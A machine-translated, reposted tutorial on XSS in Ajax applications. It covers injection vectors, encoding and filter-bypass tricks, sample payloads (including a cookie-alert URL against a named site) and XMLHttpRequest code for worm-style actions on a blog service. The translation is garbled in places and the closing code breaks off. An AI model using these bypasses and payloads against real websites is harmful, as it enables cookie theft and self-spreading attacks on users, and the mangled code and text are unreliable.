Ajax hacking (Monyer)

Source: Internet
Author: User
Tags control characters java format

Author: the light of dreams

After I published the "Ajax hacking" in the tenth issue, the following questions about XSS are raised by some netizens. Why is XSS used in Ajax hacking? What is the difference between XSS and traditional XSS? What are their respective advantages and disadvantages? Are the XSS vulnerabilities of large websites vulnerable? Let's take a detailed analysis.

Ajax hacking

The term Ajax hacking first appeared in Billy Hoffman's "AJAX dangers" report. He defined samy and yamanner as AJAX hacking. Before that, they were said to belong to the Web worm (or XSSworm), but there was no clear definition of this attack form. Here we will discuss the XSS in AJax hacking in depth. For other types of Ajax attacks, please refer to the article "Top 10 Ajax Security Holes and Driving Factors" on the Internet or translate them into Chinese "Top 10 Security threats under Web".

In traditional XSS attacks, we usually aim to directly escalate permissions or obtain Cookies and then escalate permissions. Therefore, the code execution method is windows. open, window. location or iframe, so its two major weaknesses are shown, not spreading or exposed. The new AJax technology is used in Ajax hacking to transform attack methods and objects. In fact, most people do what they can do after obtaining administrator permissions and having File Change permissions. They seldom design trade secrets! This attack directly targets the client. Because all the data is obtained asynchronously, it has a strong concealment capability. By manipulating the user permissions that have been logged on, you can directly change user information, or even make the code set automatically spread to implement the worm function.

XSS usage

In the spread of XSS attacks, code insertion is typically used in URL and text areas (textarea. However, for a site that has recently used Ajax technology to build a site, using the new form of Ajax hacking technology, you can extend the method to the URL domain, input domain, textarea domain, embed domain, css, rss, and xml vector in seven ways.


The xss url is generally "(Domain Name)/(File Name) (File Format )? (Field name) = (field content) ", and the field content is usually displayed or called at a location on the page. Due to the negligence of the website writers, the website did not perform security detection and filtering on the field content, but directly called to the page, so that we can only replace the field content with the XSS code we want to generate cross-site. For example:

Http://club.sohu.com/joke/1.htm? Stra = <script> alert (document. cookie); </script>
However, this method usually needs to trick users into clicking the link you forged in advance, and you can link them to a forum or use E-mail for phishing.

Input, textarea, and css XSS

Input, textarea, and css XSS are the most widely used methods. Since css actually belongs to a part of Dhtml, their usage methods and bypassing filtering features are also similar, we will focus on relevant explanations and experiments later.

Embed XSS

Embed XSS is generally used on websites that allow video, music, and flash insertion. If you link to a flash file that is maliciously constructed with XSS scripts, for example, <embed src = "xss.swf"> </EMBED>. Then, we construct a special .swf file and insert the js or vbs code referenced by Action Script into the Action of the flash file. When a user accesses this page, the cross-site is generated.

Rss and Xml XSS

This type of attack is generally used on sites that can be rss aggregated and some local rss interpreters (it is said that XSS is performed on the local rss interpreter, there is a possibility of obtaining host permissions, but I have not tried this !), In addition, because rss files can be referenced on any site, it is very easy to test such attacks, and the effect is quite obvious. The following is an example of calling remote rss. xml locally without any filtering settings, and the filtering effect of Google calling this rss.

Code Insertion Method

Because the inserted script is js or vbs, all general keywords such as JavaScript, VbScript, and expression, such as , however, the three keywords can be omitted when the mouse or keyboard response is received, so the following method is used: or <INPUT onkeyup =" alert (XSS); ">. Because html does not follow the xhtml standard, you can insert the following methods:

1. You can use double quotation marks for tag attributes, single quotation marks, or no quotation marks;

2. the attribute values can be capitalized, lowercase, or mixed;

3. You can insert a carriage return, including the end character and line break, namely, char (10), char (13), and tab space;

4. If the style format is used, you can insert the Backslash "", annotator "/**/";

5. The inserted code can be converted to a hexadecimal or hexadecimal notation;

6. Due to the uncertainty of the prohibitions, the hexadecimal string you insert can be converted into a series and can be combined at will;

7. The following 15 encoding methods can be entered into the character "j" and are case insensitive.

6A6A06A006A0006A // hexadecimal code in java format

Jjjjj // decimal code

Jjjjj // hexadecimal Encoding

8. Other encoding methods, such as htmlEncode and URLEncode, are used to encode html and URL.

As for html tags that can insert code ...... To put it bluntly, almost all labels that can insert attributes can insert Code, for example, <bstyle = "xss: expression (alert (XSS)">.

The attributes of codes that can be inserted in html tags are src, style, and dynsrc (commonly used in img and input, and this attribute can also be used to insert videos), lowsrc (preload thumbnail), mouse properties (such as o n m o u s e o v e r), keyboard properties (such as onkeypress), href attributes (commonly used in a and link), boby onload attributes, URL attributes, and so on.

Filter Bypass Methods

Of course, it is impossible for other websites to let you enter the code, so they usually filter the characters you enter. Therefore, the compiled code can be smoothly inserted and executed, and some key characters may be filtered out, such as "JavaScript ". If this is the only filtering method, it is too simple to bypass the method. You only need to enter "javajavascriptscript" or another character whenever you enter this character. Of course, website programmers are still not so stupid, they will conduct various filtering to guard against you, so combined with the above "code insertion method ", you may summarize the following methods to bypass the website filtering system:

1. Fill in with the ASCII code of the Control Character

For example, if you are familiar with ASCII codes, you should know that the total number of system control characters is 33, remove the header & #00 (null) and the end (del). The Code header can be smoothly inserted with the other 31 characters to confuse the filtering system without affecting the execution of the original code, in addition, you can still use solution 7 in "code Insertion Method" to perform arbitrary conversion of encoding. Seven tab characters, line breaks, and carriage returns can be inserted anywhere in the code.

2. Insert obfuscation attributes

When we perform common text input, we will find that not all characters with "performanceipt" will be filtered out. But only special characters in the html Tag will be filtered out, which gives us a set of bypassing Measures to insert another obfuscation Attribute before the attributes of the inserted code, insert the characters in this attribute that make the filtering system mistakenly think of as the tag Terminator, so that the filtering system considers the code to be executed outside the html Tag. For example:

// Insert the obfuscation of src.

<SCRIPT> [code] </SCRIPT>"> // insert double quotation marks and ">" symbol

<SCRIPT a = ">" SRC = "xss. js"> </SCRIPT> // Insert the obfuscated a attribute.

3. Use annotator to separate

Because the browser ignores the annotator of each type of code, if we use the annotator in the code, we can successfully fool the filtering system without affecting the normal operation of the XSS code. For example:

// The comments of css are/**/, and the content is ignored.

<Style> @ importjavascept: alert ("XSS"); </style> // The symbols ignored in css are also ""

Exp/* <a style = noxss: noxss ("* // *"); xss: ex/* XSS * // */expression (alert ("XSS")> // comment the obfuscation

<Style> <! -- </Style> <script> [code] // --> </script> // The html annotator is <! -- Comment -->

4. js coding and calling

If the filter system filters out many feature characters, it will be very troublesome when we bypass the above steps, therefore, the typical bypass scheme also involves js coding for the code or simply calling it from the outside. Of course, because of the browser's Ajax security mechanism, you must ensure that the called files are on the same server; otherwise, an error message will appear.

Asynchronous Data Call

Since it is Ajax hacking, it is natural to use Asynchronous Data calls. Here we will briefly introduce the relevant knowledge. A deeper understanding is the result of long-term practice.

1. Declare the xmlhttprequest object

Before calling data, you must declare the xmlhttprequest object. The simplest method in IE6 and earlier versions is:

Var XmlHttp = new ActiveXObject ("Microsoft. XMLhttp ");

The declaration method in IE7 and firefox is:

Var req = new XMLHttpRequest ();

Therefore, if we want to compile code with better compatibility, we can judge the client browser and define the xmlhttprequest object separately, as shown below:

If (window. XMLHttprequest ){
XmlHttp = new XMLHttpRequest ();
} Else if (window. ActiveXObject ){
Xmlhttp = new ActiveXObject (Microsoft. XMLHTTP );
Then use the following method to pass Parameters

XmlHttp. Open ("POST", "URL", true );
XmlHttp. send (null );

Here, the first option in XmlHttp. Open is the page request method, which can be post, get, and head. The third option is true, indicating asynchronous mode and false indicating synchronous mode.

With the above code, you can simply add a friendly link for any user to the current user in the TOM blog. If the link is added successfully, the OK window is returned. If the link is added successfully, friended is returned. The Code is as follows:

Var XmlHttp = new ActiveXObject ("Microsoft. XMLh

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.